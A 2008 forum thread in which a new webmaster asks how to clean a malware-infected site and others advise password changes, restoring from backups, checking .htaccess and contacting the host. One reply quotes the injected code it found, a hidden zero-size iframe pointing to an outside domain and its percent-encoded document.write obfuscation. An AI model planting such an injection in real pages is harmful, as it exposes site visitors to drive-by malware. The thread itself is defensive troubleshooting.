12-18-2008, 05:52 PM
Hello. I received a troubling email from a user of my website this morning, notifying me that my website has been infected by malware, and is dangerous to its visitors. I am new to web design and do not know how this happened, or how to remove it. I noticed last night that a strange glitch was causing my site’s home page, along with any pages linked to it named “index” to have their tables misaligned. Since I had added a code I fund online for faviconcs to the home page of the site on its last update a week earlier, I thought that might be responsible. (That code was <link rel="shortcut icon" href="/favicon.ico">) I tried removing this code and re-uploading the effected pages. This seemed to correct the misalignment, but I am worried that a worse problem has arisen. Is there anyone who can give me any advice? Any suggestions for how to make my website safe again would be very appreciated!
(If relevant, my website URL is www.Nosgoth.net.)
12-18-2008, 06:13 PM
favicon wouldnt cause it do do that. someone must have logged in and added other code.
If it is infected I wont click on the link you posted. My mom had to have me reinstall her computer because of stuff like this, she went on a baby shower website and got bombarded by self-installing trojans.
I suggest change your passwords for your host login and upload your site from your backup files.
make sure you computer doesnt have any keyloggers that would save passwords.
12-18-2008, 06:36 PM
I found this in your code
<iframe src="http://palech.com/index.php" width="0" height="0" style="display:none"></iframe>
Its the decryption of this
<!-- HTML Encryption provided by iWEBTOOL.com -->
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63 %68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74% 3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%6 5%3E'));
Did you put any of that there yourself? I suggest you contact your host and try to remove any code that looks like the above.
12-20-2008, 12:36 PM
Thank you both very much! If Windows’ AutoComplete feature counts as what you mean by a keylogger, I did have one that had memorized the password for my website. I have now changed my password and re-uploaded everything from the files on my hard drive. It appears to be working now. Hopefully it will continue to.
12-20-2008, 03:48 PM
I was having the same problem with one of my sites. Apparently, someone gained access to an FTP login, and was changing the .htaccess file to redirect to a bogus anti-virus site. So while there may have been nothing wrong with your site, it's the best idea to make sure this .htaccess file is not changed, and the login passwords, along with FTP passwords are changed.
12-20-2008, 08:52 PM
I would second what Aero says, contact your host. They know these things and can often fix them for you. Of course a good password is paramount though. I had this happen to a client, because they chose a dictionary word as a password, and it was hacked. Its pesky, because you don't always know where the affected areas are, and your support might be able to track down when it occurred, which files were changed, and clean it up must faster (and more thoroughly) than you can on your own.
Of course if you have little or no support, check the .htaccess and look at every file and folder!